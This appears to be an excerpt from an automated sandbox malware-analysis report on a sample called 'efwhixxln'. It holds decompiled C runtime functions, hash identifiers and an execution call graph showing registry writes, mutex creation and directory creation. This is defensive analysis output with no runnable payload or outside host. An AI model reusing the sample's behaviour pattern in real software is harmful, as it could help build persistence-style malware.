                                      • Opcode ID: 9e3d08d9d8b8cbccd9aa46752a9a02badfb21c37146b35ec9e066227df42940b
                                      • Instruction ID: 61f947c996ca1a67885c84a75fe1426d65295c5a16dda6521d063a9dc6fb5bb1
                                      • Opcode Fuzzy Hash: 9e3d08d9d8b8cbccd9aa46752a9a02badfb21c37146b35ec9e066227df42940b
                                      • Instruction Fuzzy Hash: F4017931D41A22EBDA21AB65994974B7360AF04754F45027FE800BB2D2CB7C6841DFDE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E0040137E(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                      				void* _t7;
                                      				long _t8;
                                      				intOrPtr* _t9;
                                      				intOrPtr* _t12;
                                      				long _t27;
                                      				long _t30;
                                      
                                      				if(_a4 != 0) {
                                      					_push(__esi);
                                      					_t30 = _a8;
                                      					__eflags = _t30;
                                      					if(_t30 != 0) {
                                      						_push(__edi);
                                      						while(1) {
                                      							__eflags = _t30 - 0xffffffe0;
                                      							if(_t30 > 0xffffffe0) {
                                      								break;
                                      							}
                                      							__eflags = _t30;
                                      							if(_t30 == 0) {
                                      								_t30 = _t30 + 1;
                                      								__eflags = _t30;
                                      							}
                                      							_t7 = HeapReAlloc( *0x40cfc4, 0, _a4, _t30);
                                      							_t27 = _t7;
                                      							__eflags = _t27;
                                      							if(_t27 != 0) {
                                      								L17:
                                      								_t8 = _t27;
                                      							} else {
                                      								__eflags =  *0x40d62c - _t7;
                                      								if(__eflags == 0) {
                                      									_t9 = E00401E66(__eflags);
                                      									 *_t9 = E00401E24(GetLastError());
                                      									goto L17;
                                      								} else {
                                      									__eflags = E00402477(_t7, _t30);
                                      									if(__eflags == 0) {
                                      										_t12 = E00401E66(__eflags);
                                      										 *_t12 = E00401E24(GetLastError());
                                      										L12:
                                      										_t8 = 0;
                                      										__eflags = 0;
                                      									} else {
                                      										continue;
                                      									}
                                      								}
                                      							}
                                      							goto L14;
                                      						}
                                      						E00402477(_t6, _t30);
                                      						 *((intOrPtr*)(E00401E66(__eflags))) = 0xc;
                                      						goto L12;
                                      					} else {
                                      						E004012B0(_a4);
                                      						_t8 = 0;
                                      					}
                                      					L14:
                                      					return _t8;
                                      				} else {
                                      					return E004012EA(__edx, __edi, __esi, _a8);
                                      				}
                                      			}









                                      0x00401387
                                      0x00401394
                                      0x00401395
                                      0x00401398
                                      0x0040139a
                                      0x004013a9
                                      0x004013dc
                                      0x004013dc
                                      0x004013df
                                      0x00000000
                                      0x00000000
                                      0x004013ac
                                      0x004013ae
                                      0x004013b0
                                      0x004013b0
                                      0x004013b0
                                      0x004013bd
                                      0x004013c3
                                      0x004013c5
                                      0x004013c7
                                      0x00401427
                                      0x00401427
                                      0x004013c9
                                      0x004013c9
                                      0x004013cf
                                      0x00401411
                                      0x00401425
                                      0x00000000
                                      0x004013d1
                                      0x004013d8
                                      0x004013da
                                      0x004013f9
                                      0x0040140d
                                      0x004013f3
                                      0x004013f3
                                      0x004013f3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004013da
                                      0x004013cf
                                      0x00000000
                                      0x004013f5
                                      0x004013e2
                                      0x004013ed
                                      0x00000000
                                      0x0040139c
                                      0x0040139f
                                      0x004013a5
                                      0x004013a5
                                      0x004013f6
                                      0x004013f8
                                      0x00401389
                                      0x00401393
                                      0x00401393

                                      APIs
                                      • _malloc.LIBCMT ref: 0040138C
                                        • Part of subcall function 004012EA: __FF_MSGBANNER.LIBCMT ref: 00401303
                                        • Part of subcall function 004012EA: __NMSG_WRITE.LIBCMT ref: 0040130A
                                        • Part of subcall function 004012EA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004059AC,?,00000001,?,?,00406229,00000018,0040AE90,0000000C,004062B9), ref: 0040132F
                                      • _free.LIBCMT ref: 0040139F
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID:
                                      • API String ID: 1020059152-0
                                      • Opcode ID: 43ddb7a184c6da373f4c0bf6b210ad168dbc7d24905898b017241f79401b3c70
                                      • Instruction ID: d24a7906eaa927bdfab9682e7e9c0c1dd222746acacd840904e66b7a229e9837
                                      • Opcode Fuzzy Hash: 43ddb7a184c6da373f4c0bf6b210ad168dbc7d24905898b017241f79401b3c70
                                      • Instruction Fuzzy Hash: 67119432904611ABEB212B75E905A9F3694DB443A4F20453FFC48BA6F1DB3D8C41979D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E004058FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t12;
                                      				void* _t28;
                                      				intOrPtr _t29;
                                      				void* _t30;
                                      				void* _t31;
                                      
                                      				_t31 = __eflags;
                                      				_t26 = __edi;
                                      				_t25 = __edx;
                                      				_t20 = __ebx;
                                      				_push(0xc);
                                      				_push(0x40ae70);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t28 = E004042F0(__ebx, __edx, _t31);
                                      				_t12 =  *0x40ca98; // 0xfffffffe
                                      				if(( *(_t28 + 0x70) & _t12) == 0) {
                                      					L6:
                                      					E0040629E(_t20, _t26, 0xc);
                                      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                      					_t29 = _t28 + 0x6c;
                                      					 *((intOrPtr*)(_t30 - 0x1c)) = E004058B2(_t29,  *0x40cce0);
                                      					 *(_t30 - 4) = 0xfffffffe;
                                      					E0040596C();
                                      				} else {
                                      					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                      						goto L6;
                                      					} else {
                                      						_t29 =  *((intOrPtr*)(E004042F0(_t20, __edx, _t33) + 0x6c));
                                      					}
                                      				}
                                      				_t34 = _t29;
                                      				if(_t29 == 0) {
                                      					_push(0x20);
                                      					E0040223C(_t25, _t34);
                                      				}
                                      				return E00402F05(_t29);
                                      			}








                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x00405901
                                      0x00405906
                                      0x00405910
                                      0x00405912
                                      0x0040591a
                                      0x0040593e
                                      0x00405940
                                      0x00405946
                                      0x00405950
                                      0x0040595b
                                      0x0040595e
                                      0x00405965
                                      0x0040591c
                                      0x0040591c
                                      0x00405920
                                      0x00000000
                                      0x00405922
                                      0x00405927
                                      0x00405927
                                      0x00405920
                                      0x0040592a
                                      0x0040592c
                                      0x0040592e
                                      0x00405930
                                      0x00405935
                                      0x0040593d

                                      APIs
                                      • __getptd.LIBCMT ref: 0040590B
                                        • Part of subcall function 004042F0: __getptd_noexit.LIBCMT ref: 004042F3
                                        • Part of subcall function 004042F0: __amsg_exit.LIBCMT ref: 00404300
                                      • __getptd.LIBCMT ref: 00405922
                                      • __amsg_exit.LIBCMT ref: 00405930
                                      • __lock.LIBCMT ref: 00405940
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00405954
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 31437981d7cea4519be4af5e9366cedaf90d851205a86ad2be68fc1ec5807629
                                      • Instruction ID: 672b8ff66245b7122317208c76101a1feb13e167aa3bf42c285fe57ecdeaa840
                                      • Opcode Fuzzy Hash: 31437981d7cea4519be4af5e9366cedaf90d851205a86ad2be68fc1ec5807629
                                      • Instruction Fuzzy Hash: 06F06272940B00DAE720BBA9950670F33A0AF00764F11417FF845762D2CBBC59509E9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405B0B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				char _v8;
                                      				signed int _v12;
                                      				char _v20;
                                      				char _t43;
                                      				char _t46;
                                      				signed int _t53;
                                      				signed int _t54;
                                      				intOrPtr _t56;
                                      				intOrPtr _t57;
                                      				int _t58;
                                      				char _t59;
                                      				short* _t60;
                                      				int _t65;
                                      				char* _t73;
                                      
                                      				_t73 = _a8;
                                      				if(_t73 == 0 || _a12 == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					if( *_t73 != 0) {
                                      						E00401EAF( &_v20, __edi, _a16);
                                      						_t43 = _v20;
                                      						__eflags =  *(_t43 + 0x14);
                                      						if( *(_t43 + 0x14) != 0) {
                                      							_t46 = E00405C3B( *_t73 & 0x000000ff,  &_v20);
                                      							__eflags = _t46;
                                      							if(_t46 == 0) {
                                      								__eflags = _a4;
                                      								_t40 = _v20 + 4; // 0x840ffff8
                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                      								if(__eflags != 0) {
                                      									L10:
                                      									__eflags = _v8;
                                      									if(_v8 != 0) {
                                      										_t53 = _v12;
                                      										_t11 = _t53 + 0x70;
                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                      										__eflags =  *_t11;
                                      									}
                                      									return 1;
                                      								}
                                      								L21:
                                      								_t54 = E00401E66(__eflags);
                                      								 *_t54 = 0x2a;
                                      								__eflags = _v8;
                                      								if(_v8 != 0) {
                                      									_t54 = _v12;
                                      									_t33 = _t54 + 0x70;
                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                      									__eflags =  *_t33;
                                      								}
                                      								return _t54 | 0xffffffff;
                                      							}
                                      							_t56 = _v20;
                                      							_t15 = _t56 + 0xac; // 0x50036acc
                                      							_t65 =  *_t15;
                                      							__eflags = _t65 - 1;
                                      							if(_t65 <= 1) {
                                      								L17:
                                      								_t24 = _t56 + 0xac; // 0x50036acc
                                      								__eflags = _a12 -  *_t24;
                                      								if(__eflags < 0) {
                                      									goto L21;
                                      								}
                                      								__eflags = _t73[1];
                                      								if(__eflags == 0) {
                                      									goto L21;
                                      								}
                                      								L19:
                                      								_t26 = _t56 + 0xac; // 0x50036acc
                                      								_t57 =  *_t26;
                                      								__eflags = _v8;
                                      								if(_v8 == 0) {
                                      									return _t57;
                                      								}
                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                      								return _t57;
                                      							}
                                      							__eflags = _a12 - _t65;
                                      							if(_a12 < _t65) {
                                      								goto L17;
                                      							}
                                      							__eflags = _a4;
                                      							_t21 = _t56 + 4; // 0x840ffff8
                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                      							__eflags = _t58;
                                      							_t56 = _v20;
                                      							if(_t58 != 0) {
                                      								goto L19;
                                      							}
                                      							goto L17;
                                      						}
                                      						_t59 = _a4;
                                      						__eflags = _t59;
                                      						if(_t59 != 0) {
                                      							 *_t59 =  *_t73 & 0x000000ff;
                                      						}
                                      						goto L10;
                                      					} else {
                                      						_t60 = _a4;
                                      						if(_t60 != 0) {
                                      							 *_t60 = 0;
                                      						}
                                      						goto L5;
                                      					}
                                      				}
                                      			}

















                                      0x00405b15
                                      0x00405b1c
                                      0x00405b33
                                      0x00000000
                                      0x00405b23
                                      0x00405b25
                                      0x00405b3f
                                      0x00405b44
                                      0x00405b47
                                      0x00405b4a
                                      0x00405b72
                                      0x00405b79
                                      0x00405b7b
                                      0x00405bfc
                                      0x00405c0e
                                      0x00405c17
                                      0x00405c19
                                      0x00405b59
                                      0x00405b59
                                      0x00405b5c
                                      0x00405b5e
                                      0x00405b61
                                      0x00405b61
                                      0x00405b61
                                      0x00405b61
                                      0x00000000
                                      0x00405b67
                                      0x00405bdb
                                      0x00405bdb
                                      0x00405be0
                                      0x00405be6
                                      0x00405be9
                                      0x00405beb
                                      0x00405bee
                                      0x00405bee
                                      0x00405bee
                                      0x00405bee
                                      0x00000000
                                      0x00405bf2
                                      0x00405b7d
                                      0x00405b80
                                      0x00405b80
                                      0x00405b86
                                      0x00405b89
                                      0x00405bb0
                                      0x00405bb3
                                      0x00405bb3
                                      0x00405bb9
                                      0x00000000
                                      0x00000000
                                      0x00405bbb
                                      0x00405bbe
                                      0x00000000
                                      0x00000000
                                      0x00405bc0
                                      0x00405bc0
                                      0x00405bc0
                                      0x00405bc6
                                      0x00405bc9
                                      0x00405b38
                                      0x00405b38
                                      0x00405bd2
                                      0x00000000
                                      0x00405bd2
                                      0x00405b8b
                                      0x00405b8e
                                      0x00000000
                                      0x00000000
                                      0x00405b92
                                      0x00405ba0
                                      0x00405ba3
                                      0x00405ba9
                                      0x00405bab
                                      0x00405bae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405bae
                                      0x00405b4c
                                      0x00405b4f
                                      0x00405b51
                                      0x00405b56
                                      0x00405b56
                                      0x00000000
                                      0x00405b27
                                      0x00405b27
                                      0x00405b2c
                                      0x00405b30
                                      0x00405b30
                                      0x00000000
                                      0x00405b2c
                                      0x00405b25

                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405B3F
                                      • __isleadbyte_l.LIBCMT ref: 00405B72
                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,0040766E,00000109,00BFBBEF,00000003), ref: 00405BA3
                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0040766E,00000109,00BFBBEF,00000003), ref: 00405C11
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 141919e07fd5e067c6abddc3c99e875ae955f847959586c4bcd4af50d38ae265
                                      • Instruction ID: 5a3d825bf4fd5e60fce72e168d96e71c75f88ca3a22c931a5470049bf8964804
                                      • Opcode Fuzzy Hash: 141919e07fd5e067c6abddc3c99e875ae955f847959586c4bcd4af50d38ae265
                                      • Instruction Fuzzy Hash: C5318B31A0064AEFDB20DF64C894AAB3BB5EF01310B1585BAE461AB2D1E734FD41DF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040409C() {
                                      				WCHAR* _t2;
                                      				void* _t15;
                                      				WCHAR* _t17;
                                      
                                      				_t2 = GetEnvironmentStringsW();
                                      				_t17 = _t2;
                                      				if(_t17 != 0) {
                                      					if( *_t17 != 0) {
                                      						goto L3;
                                      						do {
                                      							do {
                                      								L3:
                                      								_t2 =  &(_t2[1]);
                                      							} while ( *_t2 != 0);
                                      							_t2 =  &(_t2[1]);
                                      						} while ( *_t2 != 0);
                                      					}
                                      					_t1 = _t2 - _t17 + 2; // -2
                                      					_t10 = _t1;
                                      					_t15 = E0040599B(_t1);
                                      					if(_t15 != 0) {
                                      						E00405D30(_t15, _t17, _t10);
                                      					}
                                      					FreeEnvironmentStringsW(_t17);
                                      					return _t15;
                                      				} else {
                                      					return 0;
                                      				}
                                      			}






                                      0x0040409f
                                      0x004040a5
                                      0x004040ab
                                      0x004040b4
                                      0x00000000
                                      0x004040b6
                                      0x004040b6
                                      0x004040b6
                                      0x004040b6
                                      0x004040b9
                                      0x004040be
                                      0x004040c1
                                      0x004040b6
                                      0x004040c9
                                      0x004040c9
                                      0x004040d3
                                      0x004040d8
                                      0x004040ea
                                      0x004040ef
                                      0x004040db
                                      0x004040e6
                                      0x004040ad
                                      0x004040b0
                                      0x004040b0

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00401BD2), ref: 0040409F
                                      • __malloc_crt.LIBCMT ref: 004040CE
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004040DB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      • Opcode ID: 0f3171e8f164e7bcc94d10f6e0a877011af5dd8662ebb30760093320b0531c50
                                      • Instruction ID: 1fa36d951bb440bfa3f85e2b48734ef180dce86ebb10b8179ed48f040844c6ea
                                      • Opcode Fuzzy Hash: 0f3171e8f164e7bcc94d10f6e0a877011af5dd8662ebb30760093320b0531c50
                                      • Instruction Fuzzy Hash: 61F0E2F75110109ACB31BB35BC498672378DAD536430A483BF701F33C1FA388D8186AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:14.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:6.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:48
                                      execution_graph 10466 40c74b InitializeCriticalSection 10506 4059a9 GetProcessHeap HeapAlloc 10466->10506 10468 40c793 10469 4030c5 9 API calls 10468->10469 10470 40c7ca 10469->10470 10471 4030c5 9 API calls 10470->10471 10472 40c7dc 10471->10472 10473 40d780 3 API calls 10472->10473 10474 40c7e1 10473->10474 10475 40c7e6 10474->10475 10476 40c81b 10474->10476 10478 4030c5 9 API calls 10475->10478 10477 402f9a 5 API calls 10476->10477 10479 40c825 10477->10479 10480 40c7f2 10478->10480 10482 4031fd 3 API calls 10479->10482 10507 402f9a 10480->10507 10484 40c832 10482->10484 10514 4058fb VirtualFree 10484->10514 10485 4031fd 3 API calls 10487 40c809 10485->10487 10512 4058fb VirtualFree 10487->10512 10488 40c819 10490 403230 9 API calls 10488->10490 10491 40c847 10490->10491 10493 403230 9 API calls 10491->10493 10492 40c811 10494 4030c5 9 API calls 10492->10494 10495 40c84f 10493->10495 10494->10488 10513 40d4d0 SHCreateDirectoryExW 10495->10513 10497 40c856 10498 4031fd 3 API calls 10497->10498 10499 40c863 10498->10499 10500 403230 9 API calls 10499->10500 10501 40c86f 10500->10501 10502 403230 9 API calls 10501->10502 10503 40c87c 10502->10503 10504 403230 9 API calls 10503->10504 10505 40c884 10504->10505 10506->10468 10508 401052 10507->10508 10509 402fbc ExpandEnvironmentStringsW 10508->10509 10510 4033ab 4 API calls 10509->10510 10511 402fe1 10510->10511 10511->10485 10512->10492 10513->10497 10514->10488 12605 40cd50 12606 4031bb 3 API calls 12605->12606 12607 40cd66 12606->12607 12616 4045be 12607->12616 12610 404a3d 26 API calls 12611 40cd77 12610->12611 12612 404560 VirtualFree 12611->12612 12613 40cd7f 12612->12613 12625 4058fb VirtualFree 12613->12625 12615 40cd87 12617 402e63 10 API calls 12616->12617 12618 4045dc 12617->12618 12619 4031fd 3 API calls 12618->12619 12620 4045e5 12619->12620 12626 4058fb VirtualFree 12620->12626 12622 4045ed 12627 4058fb VirtualFree 12622->12627 12624 4045f9 12624->12610 12625->12615 12626->12622 12627->12624 10621 410a5e 10624 401fd6 10621->10624 10630 402053 10624->10630 10626 401ff1 10627 402014 10626->10627 10633 4020a7 10626->10633 10638 401f0e 10626->10638 10650 4059a9 GetProcessHeap HeapAlloc 10630->10650 10632 40207c 10632->10626 10632->10632 10634 4056f9 3 API calls 10633->10634 10635 4020bc 10634->10635 10651 401ed8 10635->10651 10639 401fa7 10638->10639 10640 401f24 10638->10640 10642 40201d 3 API calls 10639->10642 10658 4059a9 GetProcessHeap HeapAlloc 10640->10658 10643 401fc4 10642->10643 10644 40138f VirtualFree 10643->10644 10645 401fcf 10644->10645 10645->10626 10646 401f9b 10646->10639 10648 401a1e VirtualFree 10646->10648 10647 401f4d 10647->10646 10659 40201d 10647->10659 10648->10639 10650->10632 10652 4033f3 3 API calls 10651->10652 10653 401ee8 10652->10653 10654 4033f3 3 API calls 10653->10654 10655 401ef4 10654->10655 10656 4033f3 3 API calls 10655->10656 10657 401f00 10656->10657 10657->10626 10658->10647 10660 4031fd 3 API calls 10659->10660 10661 40202d 10660->10661 10662 4031fd 3 API calls 10661->10662 10663 402039 10662->10663 10664 4031fd 3 API calls 10663->10664 10665 402045 10664->10665 10665->10647 12639 403965 12640 40f56d 9 API calls 12639->12640 12641 40398a 12640->12641 12642 4031fd 3 API calls 12641->12642 12643 403994 12642->12643 12652 4058fb VirtualFree 12643->12652 12645 40399c 12646 402c1e 8 API calls 12645->12646 12647 4039c3 12646->12647 12648 402c65 2 API calls 12647->12648 12649 4039cc 12648->12649 12650 402dff 2 API calls 12649->12650 12651 4039d4 12650->12651 12652->12645 10710 404a69 10711 404a89 10710->10711 10712 404a9e 10710->10712 10711->10712 10714 402d8c 2 API calls 10711->10714 10814 404fdc 10711->10814 10713 402d5a 6 API calls 10712->10713 10712->10814 10715 404aed 10713->10715 10714->10712 10716 404afb 10715->10716 10717 404d5c 10715->10717 10720 404b01 10716->10720 10721 404d37 10716->10721 10718 404e94 10717->10718 10719 404d65 10717->10719 10722 404f42 10718->10722 10723 404e9d 10718->10723 10724 404e76 10719->10724 10725 404d6b 10719->10725 10726 404b0a 10720->10726 10727 404c2d 10720->10727 10841 4059a9 GetProcessHeap HeapAlloc 10721->10841 10855 4059a9 GetProcessHeap HeapAlloc 10722->10855 10730 404ea8 10723->10730 10731 404f2c 10723->10731 10849 4059a9 GetProcessHeap HeapAlloc 10724->10849 10737 404e3c 10725->10737 10738 404d7f 10725->10738 10758 404e44 10725->10758 10733 404b10 10726->10733 10734 404c0f 10726->10734 10735 404d16 10727->10735 10736 404c36 10727->10736 10752 404f0c 10730->10752 10766 404eb2 10730->10766 10778 404f14 10730->10778 10854 4059a9 GetProcessHeap HeapAlloc 10731->10854 10743 404bf2 10733->10743 10744 404b18 10733->10744 10833 4059a9 GetProcessHeap HeapAlloc 10734->10833 10840 4059a9 GetProcessHeap HeapAlloc 10735->10840 10745 404c41 10736->10745 10746 404cf9 10736->10746 10847 4059a9 GetProcessHeap HeapAlloc 10737->10847 10748 404d87 10738->10748 10749 404e1f 10738->10749 10832 4059a9 GetProcessHeap HeapAlloc 10743->10832 10754 404b23 10744->10754 10755 404bd5 10744->10755 10756 404c49 10745->10756 10757 404cdc 10745->10757 10839 4059a9 GetProcessHeap HeapAlloc 10746->10839 10760 404e02 10748->10760 10761 404d8b 10748->10761 10846 4059a9 GetProcessHeap HeapAlloc 10749->10846 10750 40f25f 17 API calls 10762 404b47 10750->10762 10853 4059a9 GetProcessHeap HeapAlloc 10752->10853 10769 404bb8 10754->10769 10770 404b2b 10754->10770 10831 4059a9 GetProcessHeap HeapAlloc 10755->10831 10771 404c4d 10756->10771 10772 404cbf 10756->10772 10838 4059a9 GetProcessHeap HeapAlloc 10757->10838 10758->10762 10848 4059a9 GetProcessHeap HeapAlloc 10758->10848 10845 4059a9 GetProcessHeap HeapAlloc 10760->10845 10779 404de5 10761->10779 10780 404d8f 10761->10780 10825 404753 252 API calls 10762->10825 10765 404ee5 10765->10762 10852 4059a9 GetProcessHeap HeapAlloc 10765->10852 10766->10765 10783 404eba 10766->10783 10784 404edd 10766->10784 10767 404c17 10767->10762 10785 4038cc VirtualAlloc 10767->10785 10830 4059a9 GetProcessHeap HeapAlloc 10769->10830 10773 404b9e 10770->10773 10774 404b2f 10770->10774 10775 404c51 10771->10775 10776 404ca2 10771->10776 10837 4059a9 GetProcessHeap HeapAlloc 10772->10837 10829 4059a9 GetProcessHeap HeapAlloc 10773->10829 10787 404b33 10774->10787 10788 404b7d 10774->10788 10789 404c85 10775->10789 10790 404c55 10775->10790 10836 4059a9 GetProcessHeap HeapAlloc 10776->10836 10778->10750 10778->10762 10844 4059a9 GetProcessHeap HeapAlloc 10779->10844 10792 404d93 10780->10792 10793 404dc8 10780->10793 10783->10762 10850 4059a9 GetProcessHeap HeapAlloc 10783->10850 10851 4059a9 GetProcessHeap HeapAlloc 10784->10851 10785->10762 10797 404b37 10787->10797 10798 404b5c 10787->10798 10828 4059a9 GetProcessHeap HeapAlloc 10788->10828 10835 4059a9 GetProcessHeap HeapAlloc 10789->10835 10790->10762 10834 4059a9 GetProcessHeap HeapAlloc 10790->10834 10792->10762 10842 4059a9 GetProcessHeap HeapAlloc 10792->10842 10843 4059a9 GetProcessHeap HeapAlloc 10793->10843 10797->10762 10826 4059a9 GetProcessHeap HeapAlloc 10797->10826 10827 4059a9 GetProcessHeap HeapAlloc 10798->10827 10801 404f6d 10805 404f75 10801->10805 10806 404fc7 10801->10806 10812 402e12 2 API calls 10805->10812 10810 404fc5 10806->10810 10811 402d8c 2 API calls 10806->10811 10810->10814 10816 402d8c 2 API calls 10810->10816 10811->10810 10813 404f81 10812->10813 10815 402c1e 8 API calls 10813->10815 10817 404f9c 10815->10817 10816->10814 10818 402c65 2 API calls 10817->10818 10819 404fa7 10818->10819 10820 404a77 267 API calls 10819->10820 10821 404fb5 10820->10821 10822 402dff 2 API calls 10821->10822 10823 404fbd 10822->10823 10824 402dff 2 API calls 10823->10824 10824->10810 10825->10801 10826->10762 10827->10762 10828->10762 10829->10762 10830->10762 10831->10762 10832->10762 10833->10767 10834->10762 10835->10762 10836->10762 10837->10762 10838->10762 10839->10762 10840->10762 10841->10762 10842->10762 10843->10762 10844->10762 10845->10762 10846->10762 10847->10758 10848->10762 10849->10762 10850->10762 10851->10765 10852->10762 10853->10778 10854->10762 10855->10762 12713 401b7f 12716 4058fb VirtualFree 12713->12716 12715 401b90 12716->12715 11729 40120b 11732 40ddc0 CreateMutexA 11729->11732 11731 401216 11732->11731 12739 40cd14 12740 4031bb 3 API calls 12739->12740 12741 40cd2a 12740->12741 12742 4045be 10 API calls 12741->12742 12743 40cd32 12742->12743 12744 404a3d 26 API calls 12743->12744 12745 40cd3b 12744->12745 12746 404560 VirtualFree 12745->12746 12747 40cd43 12746->12747 12750 4058fb VirtualFree 12747->12750 12749 40cd4b 12750->12749 7912 405738 GetCommandLineA 7914 40574d GetStartupInfoA 7912->7914 7921 4057c6 7914->7921 7916 405799 7917 4057a8 GetModuleHandleA 7916->7917 7924 410a7c 7917->7924 7960 4056e4 GetProcessHeap HeapAlloc 7921->7960 7923 4057d5 7923->7916 7925 410aa0 7924->7925 7926 410aa9 GetTickCount 7925->7926 7961 401085 7926->7961 7928 410ab5 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 7962 40549d 7928->7962 7934 410b42 7935 410b55 SHGetFolderPathW lstrcatW CreateDirectoryW 7934->7935 7936 410b96 7935->7936 7937 410be8 7935->7937 8085 40ec15 7936->8085 7939 410bf3 7937->7939 7940 410bee 7937->7940 8146 40496d 7939->8146 8168 40f628 GetCurrentProcess IsWow64Process 7940->8168 7944 410bff 8179 404709 7944->8179 7945 410bad 8155 4033f3 7945->8155 7957 410bdf 8167 4058fb VirtualFree 7957->8167 7959 410be6 7959->7944 7960->7923 7961->7928 8191 40df77 7962->8191 7967 403185 4 API calls 7968 4054da 7967->7968 8209 40dde1 7968->8209 7972 4054f2 8221 402e12 7972->8221 7974 4054fe 8224 402c65 7974->8224 7976 40550a 8228 402dff 7976->8228 7986 405540 7987 40f56d 9 API calls 7986->7987 7988 40555f 7987->7988 7989 4031fd 3 API calls 7988->7989 7990 40556c 7989->7990 8261 4058fb VirtualFree 7990->8261 7992 405574 7993 40f56d 9 API calls 7992->7993 7994 405593 7993->7994 7995 4031fd 3 API calls 7994->7995 7996 4055a0 7995->7996 8262 4058fb VirtualFree 7996->8262 7998 4055a8 7999 40f56d 9 API calls 7998->7999 8000 4055c7 7999->8000 8001 4031fd 3 API calls 8000->8001 8002 4055d4 8001->8002 8263 4058fb VirtualFree 8002->8263 8004 4055dc 8005 40f56d 9 API calls 8004->8005 8006 40560a 8005->8006 8007 4031fd 3 API calls 8006->8007 8008 405617 8007->8008 8264 4058fb VirtualFree 8008->8264 8010 405627 8011 402dff 2 API calls 8010->8011 8012 40562f 8011->8012 8013 402dff 2 API calls 8012->8013 